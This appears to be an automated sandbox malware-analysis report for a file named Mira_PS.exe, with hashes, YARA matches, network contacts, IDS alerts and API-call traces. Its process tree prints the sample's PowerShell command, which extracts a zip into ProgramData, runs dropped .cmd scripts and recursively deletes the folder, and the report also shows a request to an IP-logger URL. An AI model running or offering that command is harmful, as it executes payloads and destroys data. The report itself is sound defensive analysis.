popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Mira_PS.exe

Gen1 NPKI Schwerer Emotet Formbook Generic Malware ASPack Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) Antivirus UPX PWS PNG Format OS Processor Check .NET EXE GIF Format PE64 PE File DLL MSOffice File PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 1, 2021, 10:55 a.m. Nov. 1, 2021, 11:19 a.m.
Size 17.0KB
Type PE32 executable (console) Intel 80386, for MS Windows
MD5 d31c7d2c2cfa9b2baced699c04a00107
SHA256 85536d80cd215c55c6e716a82daf73c9fb700ca68cbf6a0df0ef0c1ec8ed61a1
CRC32 ACD97C39
ssdeep 384:BGqjA5YXCGpIjD85S4n5kuRfTno0NjD9p+mOe786edV:iYXCGOjDY/no+96e7odV
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

  • Mira_PS.exe "C:\Users\test22\AppData\Local\Temp\Mira_PS.exe"

    2340

    • cmd.exe C:\Windows\system32\cmd.exe /c powershell "(new-object -com shell.application).namespace('C:\ProgramData\').CopyHere((new-object -com shell.application).namespace('C:\ProgramData\ctf635.zip').Items(),0x14);Invoke-Item C:\ProgramData\\glasses.cmd.ADS.Run-me-first.cmd;Start-Sleep -s 8;Remove-Item C:\ProgramData\ -Recurse;Remove-Item C:\ProgramData\ctf635.zip;Invoke-Item C:\ProgramData\glasses.cmd;"

      2528

      • powershell.exe powershell "(new-object -com shell.application).namespace('C:\ProgramData\').CopyHere((new-object -com shell.application).namespace('C:\ProgramData\ctf635.zip').Items(),0x14);Invoke-Item C:\ProgramData\\glasses.cmd.ADS.Run-me-first.cmd;Start-Sleep -s 8;Remove-Item C:\ProgramData\ -Recurse;Remove-Item C:\ProgramData\ctf635.zip;Invoke-Item C:\ProgramData\glasses.cmd;"

        2692

Name Response Post-Analysis Lookup
files.catbox.moe
A 107.160.74.131
107.160.74.131
iplogger.org
A 88.99.66.31
88.99.66.31
IP Address Status Action
107.160.74.131 Active Moloch
164.124.101.2 Active Moloch
88.99.66.31 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 107.160.74.131:443 -> 192.168.56.103:49168 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 107.160.74.131:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49165 -> 107.160.74.131:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49593 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49593
88.99.66.31:443 		C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA CN=*.iplogger.org 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

 buffer: W
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: m
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: C
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: h
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: a
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: a
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: n
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: a
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: m
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: b
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: n
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: n
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: g
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: n
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: h
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: W
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053da20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053da20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053da20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053da20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053da20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053da20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053dda0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053d620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0053e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04cc7de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04cc7de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04cc7de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04cc7de8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ccf088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ccf088
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04cd09d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04cd09d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET https://iplogger.org/1kF3u7
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72bd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0238a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72bd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02382000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02393000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02394000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0238b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02395000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02396000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Python Manuals.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7\Module Docs.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\InfoPath Filler 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
